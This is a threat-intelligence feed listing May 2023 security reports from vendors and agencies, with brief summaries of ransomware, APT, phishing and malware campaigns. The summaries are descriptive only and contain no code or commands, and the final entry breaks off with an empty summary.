- The FBI, CISA and Australian Cyber Security Centre (ACSC) released the joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations back in March 2023. BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Uncovering_RedStinger_new
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- Since the conflict between Russia and Ukraine began last year, it has not been only a political conflict; unsurprisingly, the cybersecurity landscape between these two countries has also been tense. A former researcher from the Malwarebytes Threat Intelligence Team discovered a new interesting bait that targeted the Eastern Ukraine region, reported that finding to the public, and tracked this actor as Red Stinger. These findings remained private for a while, but Kaspersky recently shared information about the same actor (which it called Bad Magic).
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger
—
- Intel Source:
- Fortinet
- Intel Name:
- Malicious_Python_Packages_via_Supply_Chain_Attacks
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- The FortiGuard Labs team discovered over 30 new zero-day attacks in PyPI packages (Python Package Index). These were found between late March and late April by monitoring an open-source ecosystem.
—
- Intel Source:
- Symantec
- Intel Name:
- The_Lancefly_APT_group_using_Merdoor_backdoor
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- The Lancefly APT group is attacking and targeting organizations in South and Southeast Asia with a custom-written backdoor. Lancefly’s custom malware, named Merdoor, is a powerful backdoor that has existed since 2018. The recent targets are based in South and Southeast Asia, in sectors including government, aviation, education, and telecoms. Symantec researchers observed that the activity also appeared to be highly targeted, with only a small number of machines infected.
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_8220_Gang_Strategies
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers documented the recent activities of 8220 Gang, which has been active in recent months. In their article they describe an observed attack exploiting the Oracle WebLogic vulnerability CVE-2017-3506, captured by one of their honeypots. This vulnerability, with a CVSS score of 7.4, impacts the WLS Security Component of Oracle WebLogic, and when exploited can enable attackers to execute arbitrary commands remotely through an HTTP request with a specifically crafted XML document.
Source:
https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Water_Orthrus_s_New_Campaigns
- Date of Scan:
- 2023-05-17
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have been monitoring the activities of a threat actor named Water Orthrus, which spread CopperStealer malware via pay-per-install (PPI) networks. In March 2023, they observed two campaigns delivering new malware that they named CopperStealth and CopperPhish. Both malware families have characteristics close to those of CopperStealer and are likely developed by the same author, leading the researchers to believe that these campaigns are likely Water Orthrus’ new activities.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_Aurora_stealer_via_Invalid_Printer_loader
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- Malwarebytes Labs shared their discovery about this malicious campaign and its connections to other attacks. They discovered that a threat actor was using malicious ads to redirect users to what looks like a Windows security update. The scheme looked very legitimate and very much resembled what you’d expect from Microsoft. That fake security update was using a newly identified loader that, at the time of the campaign, was invisible to malware sandboxes and bypassed practically all antivirus engines. Malwarebytes Labs patched that loader and identified its actual payload as Aurora stealer.
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_ransomware_variant_Rancoz
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- This month Cyble researchers observed a ransomware variant called Rancoz, which was identified by the researcher @siri_urz. During the investigation, it was observed that this ransomware is similar to and overlaps with the Vice Society ransomware.
Source:
https://blog.cyble.com/2023/05/11/dissecting-rancoz-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- LokiLocker_Ransomware_Distributed_in_Korea
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of the LokiLocker ransomware in Korea. This ransomware is almost identical to the BlackBit ransomware and their common traits
—
- Intel Source:
- Cyble
- Intel Name:
- An_In_Depth_Look_at_Akira_Ransomware
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- Cyble researchers have come across a Reddit post about a new ransomware variant named “Akira”, actively targeting numerous organizations and exposing their sensitive data. To increase the chances of payment from victims, Akira ransomware exfiltrates and encrypts their data using a double-extortion technique. The attackers then threaten to sell or leak the stolen data on the dark web if the ransom is not paid for decrypting the data.
Source:
https://blog.cyble.com/2023/05/10/unraveling-akira-ransomware/
—
- Intel Source:
- Fortinet
- Intel Name:
- Maori_Ransomware
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs recently came across a new ransomware variant called Maori. Like other ransomware variants, it encrypts files on victims’ machines to extort money. Interestingly, this variant is designed to run on Linux architecture and is coded in Go, which is somewhat rare and increases the analysis difficulty.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-maori?&web_view=true
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Eastern_European_APT_Cyber_Operations_Undetected_Since_2020
- Date of Scan:
- 2023-05-16
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have discovered a new interesting lure that targeted the Eastern Ukraine region and reported that finding to the public. Moreover, they started tracking the actor behind it, which they internally codenamed Red Stinger.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger
—
- Intel Source:
- Securonix
- Intel Name:
- Ongoing_Phishing_Campaign_uses_Meme_Filled_Code_to_Drop_XWorm_Payloads
- Date of Scan:
- 2023-05-16
- Impact:
- MEDIUM
- Summary:
- Over the last couple of months, an interesting and ongoing attack campaign was identified and tracked by the Securonix Threat Research team. The attack campaign (tracked by Securonix as MEME#4CHAN) was leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload, to infect its victims. Securonix provided an in-depth technical analysis of this campaign.
Source:
https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/
—
- Intel Source:
- Deep Instinct Blog
- Intel Name:
- A_new_undetected_variant_of_Linux_Backdoor_BPFDoor
- Date of Scan:
- 2023-05-15
- Impact:
- MEDIUM
- Summary:
- BPFdoor is a Linux-specific, low-profile, passive backdoor intended to maintain a persistent, long-term foothold in already-breached networks and environments and functions primarily to ensure an attacker can re-enter an infected system over an extended period of time, post-compromise.
Source:
https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
—
- Intel Source:
- Mcafee
- Intel Name:
- Analysis_of_an_evasive_Shellcode
- Date of Scan:
- 2023-05-14
- Impact:
- LOW
- Summary:
- McAfee researchers have observed NSIS-based installers, delivered via e-mail as malspam, that use plugin libraries to execute the GU shellcode on the victim system.
—
- Intel Source:
- CISA
- Intel Name:
- Exploitation_of_CVE_2023_27350
- Date of Scan:
- 2023-05-14
- Impact:
- LOW
- Summary:
- The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a
—
- Intel Source:
- Dragos
- Intel Name:
- A_cybercriminal_group_attempted_an_extortion_scheme_against_Dragos
- Date of Scan:
- 2023-05-13
- Impact:
- LOW
- Summary:
- Last week, a known hacker group attempted, and failed at, an extortion scheme against Dragos. No Dragos systems were breached, including anything related to the Dragos Platform. Dragos has shared what happened during this failed extortion attempt. The cybercriminal group attempted to compromise Dragos’ information resources. The group got access by compromising the personal email address of a new sales employee prior to their start date, and subsequently used their personal information to impersonate the Dragos employee and accomplish initial steps in the employee onboarding process.
Source:
https://www.dragos.com/blog/deconstructing-a-cybersecurity-event/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Threat_Actors_Build_ESXi_Lockers_Using_Leaked_Babuk_Code
- Date of Scan:
- 2023-05-13
- Impact:
- MEDIUM
- Summary:
- SentinelLabs researchers have identified unexpected connections between ESXi ransomware families, exposing likely relationships between Babuk and more illustrious operations like Conti and REvil.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Statistics_May_1_7th_2023
- Date of Scan:
- 2023-05-13
- Impact:
- LOW
- Summary:
- ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from April 9th, 2023 to April 15th, 2023 and provides statistical information on each type.
—
- Intel Source:
- Mcafee
- Intel Name:
- The_Examination_of_Highly_Evasive_Shellcode_Based_Loader
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- McAfee researchers have deeply analyzed the GULoader campaigns and found a rise in NSIS-based installers, delivered via e-mail as malspam, that use plugin libraries to execute the GU shellcode on the victim system.
—
- Intel Source:
- ASEC
- Intel Name:
- CLR_SqlShell_malware_Attack_MS_SQL_Servers
- Date of Scan:
- 2023-05-12
- Impact:
- MEDIUM
- Summary:
- ASEC analyzed the CLR SqlShell malware that is being used to target MS-SQL servers. Similar to WebShell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS-SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior.
—
- Intel Source:
- Cert-PL
- Intel Name:
- Malspam_Campaign_Delivering_PowerDash
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- CERT-PL researchers have observed a malspam campaign delivering previously unseen PowerShell malware. They dubbed this malware family “PowerDash” because of the “/dash” path on the C2 server, which is used as a gateway for bots.
—
- Intel Source:
- Fortinet
- Intel Name:
- An_Expansion_of_RapperBot_DDoS_Botnet_into_Cryptojacking
- Date of Scan:
- 2023-05-12
- Impact:
- LOW
- Summary:
- FortiGuard researchers have analyzed new samples of the RapperBot campaign active since January 2023. The threat actors have started venturing into cryptojacking, specifically for Intel x64 machines. Initially, they deployed and executed a separate Monero cryptominer alongside the usual RapperBot binary. But in late January 2023, they combined both functionalities into a single bot.
Source:
https://www.fortinet.com/blog/threat-research/rapperbot-ddos-botnet-expands-into-cryptojacking
—
- Intel Source:
- Bitdefender
- Intel Name:
- DownEx_Espionage_activity_in_Central_Asia
- Date of Scan:
- 2023-05-12
- Impact:
- MEDIUM
- Summary:
- Last year Bitdefender Labs researchers observed an attack on foreign government institutions in Kazakhstan. During the analysis, it was discovered that this was a highly targeted attack aimed at gaining access to exfiltrate data. Bitdefender Labs researchers monitored it and the region for a while for other similar attacks. Recently they detected another attack in Afghanistan and collected additional samples and observations.
—
- Intel Source:
- Abnormal
- Intel Name:
- Taking_a_Closer_Look_at_Israel_Based_BEC_Attacks
- Date of Scan:
- 2023-05-10
- Impact:
- HIGH
- Summary:
- Researchers from Abnormal Security have discovered that an Israel-based threat group has conducted 350 BEC campaigns since February 2021, with email attacks targeting employees from 61 countries across six continents.
—
- Intel Source:
- Cofense
- Intel Name:
- MitM_Phishing_Growing_and_Using_Real_Login_Process_to_Steal_Credentials
- Date of Scan:
- 2023-05-10
- Impact:
- LOW
- Summary:
- Cofense researchers have observed that Man-in-the-middle attacks are increasing rapidly: they identified a 35% increase in volume reaching inboxes between Q1 2022 and Q1 2023, 94% of MitM credential phishing attacks reaching inboxes targeted O365 authentication, 89% of campaigns used at least one URL redirect, and 55% used two or more.
Source:
https://cofense.com/blog/cofense-intelligence-strategic-analysis-2/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Royal_Ransomware_Expands_to_Target_Linux_and_VMware_ESXi
- Date of Scan:
- 2023-05-10
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have observed that the Royal ransomware group has recently launched a variant of its encryptor malware built in the form of executable and linkable format (ELF) binary. Also, they started using the BatLoader dropper and SEO poisoning for initial access.
Source:
https://unit42.paloaltonetworks.com/royal-ransomware/
—
- Intel Source:
- Cofense
- Intel Name:
- Microsoft_Phish_Redirects_Victims_to_Catering_Voice_Recording
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- Cofense researchers have observed credential phishing campaigns that use a novel deception technique, luring unsuspecting users into a false sense of security after they’ve given away their Microsoft login information.
—
- Intel Source:
- Fortinet
- Intel Name:
- AndoryuBot_Targeting_Ruckus_Wireless_Admin_Remote_Code_Execution_Vulnerability
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- FortiGuard researchers have observed a unique botnet based on the SOCKS protocol distributed through the Ruckus vulnerability (CVE-2023-25717). It contains DDoS attack modules for different protocols and communicates with its command-and-control server using SOCKS5 proxies.
—
- Intel Source:
- Blackberry
- Intel Name:
- SideWinder_Using_Server_Based_Polymorphism_Technique
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- BlackBerry researchers have observed that APT Group SideWinder is accused of deploying a backdoor in attacks directed against Pakistan government organizations as part of a campaign that commenced in late November 2022.
Source:
https://blogs.blackberry.com/en/2023/05/sidewinder-uses-server-side-polymorphism-to-target-pakistan
—
- Intel Source:
- Quickheal
- Intel Name:
- IRCTC_fake_apps
- Date of Scan:
- 2023-05-09
- Impact:
- LOW
- Summary:
- Quickheal analysts went through the recent advisory published by the Indian Railway Catering and Tourism Corporation (IRCTC) about fake IRCTC apps. The fake IRCTC app pretends to be the real IRCTC app but is in reality a full-fledged spyware that spies on victims with ease.
Source:
https://blogs.quickheal.com/beware-fake-applications-are-disguised-as-legitimate-ones/
—
- Intel Source:
- KrebsonSecurity
- Intel Name:
- US_Job_Services_Leaks_Customer_Data
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- Researchers from KrebsonSecurity have identified a huge tranche of full credit card records exposed online, and that at first glance the domain names involved appeared to be affiliated with the United States Postal Service.
—
- Intel Source:
- Fortinet
- Intel Name:
- SideCopy_Group_Delivering_Malware_via_Phishing_Emails
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- FortiGuard researchers have identified a file that referenced an Indian state military research organization and an in-development nuclear missile. The file is meant to deploy malware with characteristics matching the APT group SideCopy. With activities dating back to at least 2019, this group has aligned its targeting with the goals and objectives of the Pakistani government.
Source:
https://www.fortinet.com/blog/threat-research/clean-rooms-nuclear-missiles-and-sidecopy
—
- Intel Source:
- Cleafy
- Intel Name:
- New_Web_Injection_Toolkit_DrIBAN_Targeting_Italian_Corporate_Banking_Clients
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Cleafy have observed that Italian corporate banking clients are the target of an ongoing financial fraud campaign that has been leveraging a new web-inject toolkit called drIBAN since at least 2019.
Source:
https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter1
—
- Intel Source:
- ASEC
- Intel Name:
- RecordBreaker_Stealer_Distributed_by_YouTube_Accounts
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) analyzed and confirmed the distribution of RecordBreaker through a YouTube account that is assumed to have been recently hacked. RecordBreaker is a new Infostealer version of Raccoon Stealer. It disguises itself as a software installer, similar to CryptBot, RedLine, and Vidar.
—
- Intel Source:
- Mcafee
- Intel Name:
- An_Increase_in_SHTML_Phishing_Attacks
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- McAfee researchers have observed a new wave of phishing attacks. In this wave, the attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or displaying phishing forms locally within the browser to harvest user-sensitive information.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shtml-phishing-attack-with-blurred-image/
—
- Intel Source:
- Cyble
- Intel Name:
- Phishing_Sites_Spreading_RAT_Called_DarkWatchMan
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a phishing website that imitated a renowned Russian website, CryptoPro CSP. TAs are using this website to distribute DarkWatchman malware.
Source:
https://blog.cyble.com/2023/05/05/sophisticated-darkwatchman-rat-spreads-through-phishing-sites/
—
- Intel Source:
- Mcafee
- Intel Name:
- New_MultiStage_Attack_and_Malware_Distribution_of_Amadey
- Date of Scan:
- 2023-05-08
- Impact:
- LOW
- Summary:
- McAfee Labs researchers have identified an increase in Wextract.exe samples that drop a malware payload in multiple stages.
—
- Intel Source:
- CERT-UA
- Intel Name:
- SmokeLoader_and_RoarBAT_Malware_Attacks_Against_Ukraine
- Date of Scan:
- 2023-05-08
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified an ongoing phishing campaign with invoice-themed lures being used to distribute the SmokeLoader malware in the form of a polyglot file.
—
- Intel Source:
- Cyble
- Intel Name:
- New_KEKW_Malware_Variant_Detected_in_PyPI_Packages
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Cyble researchers have uncovered multiple malicious Python .whl (Wheel) files that are found to be distributing a new malware named ‘KEKW’. KEKW malware can steal sensitive information from infected systems, as well as perform clipper activities which can lead to the hijacking of cryptocurrency transactions.
Source:
https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/
—
- Intel Source:
- Meta
- Intel Name:
- Multiple_Malware_Targeting_Business_Users
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Researchers from Meta have analyzed the persistent malware campaigns targeting businesses across the internet, including threat indicators to help raise the industry’s collective defenses across the internet.
Source:
https://engineering.fb.com/2023/05/03/security/malware-nodestealer-ducktail/
—
- Intel Source:
- Netskope
- Intel Name:
- The_Analysis_of_CrossLock_Ransomware
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Netskope researchers have identified a new ransomware named CrossLock. It emerged in April 2023, targeting a large digital certifier company in Brazil. This ransomware was written in Go, which has also been adopted by other ransomware groups, including Hive, due to the cross-platform capabilities offered by the language.
Source:
https://www.netskope.com/blog/netskope-threat-coverage-crosslock-ransomware
—
- Intel Source:
- Sophos
- Intel Name:
- DLL_sideloading_Attacks_Gain_New_Air_With_a_Doubled_Dragon_Breath
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Sophos researchers have spotted malicious DLL sideloading activity that builds on the classic sideloading scenario but adds complexity and layers to its execution.
Source:
https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/
—
- Intel Source:
- Lab52
- Intel Name:
- Mustang_Panda_New_Campaign_Against_Australia
- Date of Scan:
- 2023-05-07
- Impact:
- LOW
- Summary:
- Lab52 researchers have found a zip file named Biography of Senator the Hon Don Farrell.zip. Hon Don Farrell is the current Australian Secretary of State for Trade and Tourism, indicating a targeted campaign against Australia.
Source:
https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Infostealer_Embedded_in_a_Word_Document
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a malicious Word document that carries an infostealer as an embedded object.
Source:
https://isc.sans.edu/diary/Infostealer+Embedded+in+a+Word+Document/29810/
—
- Intel Source:
- Bushidotoken
- Intel Name:
- Raspberry_Robin_USB_malware_campaign
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- The Bushidotoken blog shares the technical details of this malware and analyzes how it runs and works, the commands it executes, the processes it uses, and what its C2 communications look like.
Source:
https://blog.bushidotoken.net/2023/05/raspberry-robin-global-usb-malware.html
—
- Intel Source:
- SentinelOne
- Intel Name:
- Kimsuky_New_Global_Campaign
- Date of Scan:
- 2023-05-06
- Impact:
- MEDIUM
- Summary:
- SentinelLabs has observed ongoing attacks from Kimsuky, a North Korean state-sponsored APT that has a long history of targeting organizations across Asia, North America, and Europe. Ongoing campaigns use a new malware component called ReconShark, which is actively delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros. ReconShark operates as a reconnaissance tool with unique execution instructions and server communication methods. Recent activity has been linked to a broader set of activity attributed to North Korea.
Source:
https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/
—
- Intel Source:
- SentinelOne
- Intel Name:
- The_Second_Variant_of_Atomic_Stealer_macOS_Malware
- Date of Scan:
- 2023-05-06
- Impact:
- LOW
- Summary:
- The threat actor has been busy looking for other ways to target macOS users with a different version of Atomic Stealer. In this post, SentinelLabs takes a closer look at how Atomic Stealer works and describes a previously unreported second variant. They also provide a comprehensive list of indicators to aid threat hunters and security teams defending macOS endpoints.
—
- Intel Source:
- Cyble
- Intel Name:
- BlackBit_Ransomware
- Date of Scan:
- 2023-05-06
- Impact:
- MEDIUM
- Summary:
- AhnLab shared their analysis of BlackBit ransomware, which is being distributed in Korea. BlackBit Ransomware is a LokiLocker ransomware variant based on the RaaS model. The source code of BlackBit shows the ransomware is a copy of LokiLocker with some changes such as icons, name, and color scheme. BlackBit ransomware is a sophisticated one with multiple capabilities to establish persistence, evade defenses, and impair recovery.
Source:
https://blog.cyble.com/2023/05/03/blackbit-ransomware-a-threat-from-the-shadows-of-lokilocker/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Vidar_Infostealer_targeted_a_Polish_Healthcare_Industry
- Date of Scan:
- 2023-05-05
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have observed a spearphishing email targeting the healthcare industry in Poland. The spoofed email looked like a real message sent from a Polish government entity and contained a malicious Microsoft Excel XLL attachment that can download and execute the Vidar Infostealer malware.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Destructive_cyberattack_UAC_0165_on_the_public_sector_of_Ukraine_using_RoarBat
- Date of Scan:
- 2023-05-05
- Impact:
- MEDIUM
- Summary:
- Upon receiving information about interference in the information and communication system (ICS) of one of the state organizations of Ukraine, measures to investigate a cyber attack were initiated. It was found that the performance of electronic computing machines (server equipment, automated user workstations, data storage systems) was impaired as a result of the destructive influence carried out using the appropriate software.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Malware_IcedID_information_stealer_configuration_analyses
- Date of Scan:
- 2023-05-05
- Impact:
- LOW
- Summary:
- Palo Alto researchers shared an example of an IcedID malware (information stealer) configuration, how it was obfuscated, and how they extracted it. They examined one IcedID binary and how its configuration is encrypted.
Source:
https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing/
—
- Intel Source:
- Mandiant
- Intel Name:
- The_Investigation_of_BRAINSTORM_and_RILIDE
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- Mandiant researchers have identified BRAINSTORM, a Rust-based dropper, which ultimately led to RILIDE, a Chromium-based extension first publicly reported by SpiderLabs. Careful investigation identified that the email and cryptocurrency theft ecosystem of RILIDE is larger than reported.
Source:
https://www.mandiant.com/resources/blog/lnk-between-browsers
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Longzhi_is_Back_With_New_Technique
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discovered a new campaign by Earth Longzhi that is targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji. The recent campaign, which follows months of dormancy, abuses a Windows Defender executable to perform DLL sideloading while also exploiting a vulnerable driver, zamguard64.sys, to disable security products installed on the hosts via a bring-your-own-vulnerable-driver (BYOVD) attack.
—
- Intel Source:
- Checkpoint
- Intel Name:
- North_Korean_Group_ScarCruft_Deploying_RokRAT_Malware
- Date of Scan:
- 2023-05-04
- Impact:
- LOW
- Summary:
- Checkpoint researchers have identified that the North Korean threat actor known as ScarCruft started experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default.
Source:
https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/
—
- Intel Source:
- ASEC
- Intel Name:
- CoinMiner_Distributing_to_Linux_SSH_Servers
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered XMRig CoinMiner being installed on poorly managed Linux SSH servers. The attacks have followed a distinct pattern since 2022: they involve the use of malware built with Shell Script Compiler when installing XMRig, as well as the creation of a backdoor SSH account.
—
- Intel Source:
- Prodaft
- Intel Name:
- Russian_APT_Hacked_Tajikistani_Carrier_to_Spy_on_Government_and_Public_Services
- Date of Scan:
- 2023-05-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Prodaft have observed a Russian espionage group tracked as Nomadic Octopus spying on Tajikistan’s high-ranking government officials, public service infrastructures, and telecoms services, likely by infiltrating a mobile phone carrier.
Source:
https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf
—
- Intel Source:
- SocRadar
- Intel Name:
- Diving_Deep_into_BlackByte_Ransomware
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- Researchers from SOCRadar have analyzed the BlackByte ransomware, a ransomware operation that began targeting corporate victims worldwide in July 2021. The first findings about the group emerged after victims sought help decrypting their files.
Source:
https://socradar.io/dark-web-profile-blackbyte-ransomware/
—
- Intel Source:
- Cyble
- Intel Name:
- Malware_Families_Leveraging_AresLoader_for_Distribution
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- Cyble researchers have observed a new loader called AresLoader that is used to spread several types of malware families. It is a loader malware written in the C programming language that first emerged in cybercrime forums and Telegram channels in 2022.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Internet_Threats_Are_Impersonating_Common_Industries_via_Phishing_Attacks_Web_Skimmer_Analysis_and_Many_More
- Date of Scan:
- 2023-05-03
- Impact:
- LOW
- Summary:
- PaloAlto researchers have observed the internet threat landscape and analyzed malicious URL distribution, geolocation, category analysis, and statistics describing attempted malware attacks. Also, this includes industry sectors being targeted for spoofing in phishing pages, as well as downloaded malware statistics, injected JavaScript malware analysis, and malicious DNS analysis.
Source:
https://unit42.paloaltonetworks.com/internet-threats-late-2022/
—
- Intel Source:
- Elastic
- Intel Name:
- New_LOBSHOT_Malware_Deploying_Via_Google_Ads
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Researchers from Elastic Security Labs have observed a malware family called LOBSHOT that continues to collect victims while remaining undetected. Its infrastructure is attributed to TA505, the well-known cybercriminal group associated with the Dridex, Locky, and Necurs campaigns.
Source:
https://www.elastic.co/security-labs/elastic-security-labs-discovers-lobshot-malware
—
- Intel Name:
- ASEC_Weekly_Phishing_Email_analyses_April_9_15th_2023
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypots. Their post shares cases of phishing emails distributed during the week from April 9th to April 15th, 2023, and provides statistics for each type.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Family_Rapture_is_Similar_to_Paradise
- Date of Scan:
- 2023-05-01
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. The findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.
—
- Intel Source:
- Mitiga
- Intel Name:
- A_malicious_Mitiga_document
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Last January, an attacker uploaded a malicious .docx file to VirusTotal. The attacker used several of Mitiga’s publicly available branding elements, including its logo, fonts and colors, to lend credibility to the document.
Source:
https://www.mitiga.io/blog/mitiga-advisory-virus-total
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_Statistics
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- The ASEC analysis team uses the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post lists weekly statistics collected from November 21st, 2022 (Monday) to November 27th, 2022 (Sunday).
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Overview_of_UNIZA_Ransomware
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Fortinet researchers have discovered a new ransomware variant called UNIZA. Like other ransomware variants, it uses a Command Prompt (cmd.exe) window to display its ransom message, and, unusually, it does not alter the names of the files it encrypts, making it harder to determine which files have been affected.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-uniza-coverage
—
- Intel Source:
- Trellix
- Intel Name:
- Threat_Actors_Leveraging_SEO_Poisoning
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- Trellix researchers have identified that hackers continue to innovate their techniques to infect victims, with SEO poisoning being one of the recent trends.
—
- Intel Source:
- Guardio
- Intel Name:
- The_Unstoppable_Malverposting_Continues
- Date of Scan:
- 2023-05-01
- Impact:
- LOW
- Summary:
- In this post Guardio researchers share the large number of IOC detections of malverposting, along with a detailed analysis of one campaign that uses adult-rated clickbait to deliver sophisticated malware, which makes it harder to detect and easy to propagate at scale.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- An_Ongoing_Magecart_Campaign
- Date of Scan:
- 2023-04-30
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have identified an ongoing Magecart campaign that is leveraging realistic-looking fake payment screens to capture sensitive data entered by unsuspecting users.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/04/kritec-art
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_From_APT28_Group_Distributing_Emails_With_Instructions_on_Updating_OS
- Date of Scan:
- 2023-04-30
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have observed the distribution of emails with the subject “Windows Update”, allegedly sent on behalf of the system administrators of government departments. The senders’ addresses, created on the public @outlook.com service, can be formed using the real name and initials of an employee.
—
- Intel Source:
- Bitdefender
- Intel Name:
- The_BellaCiao_Malware_of_Iran
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
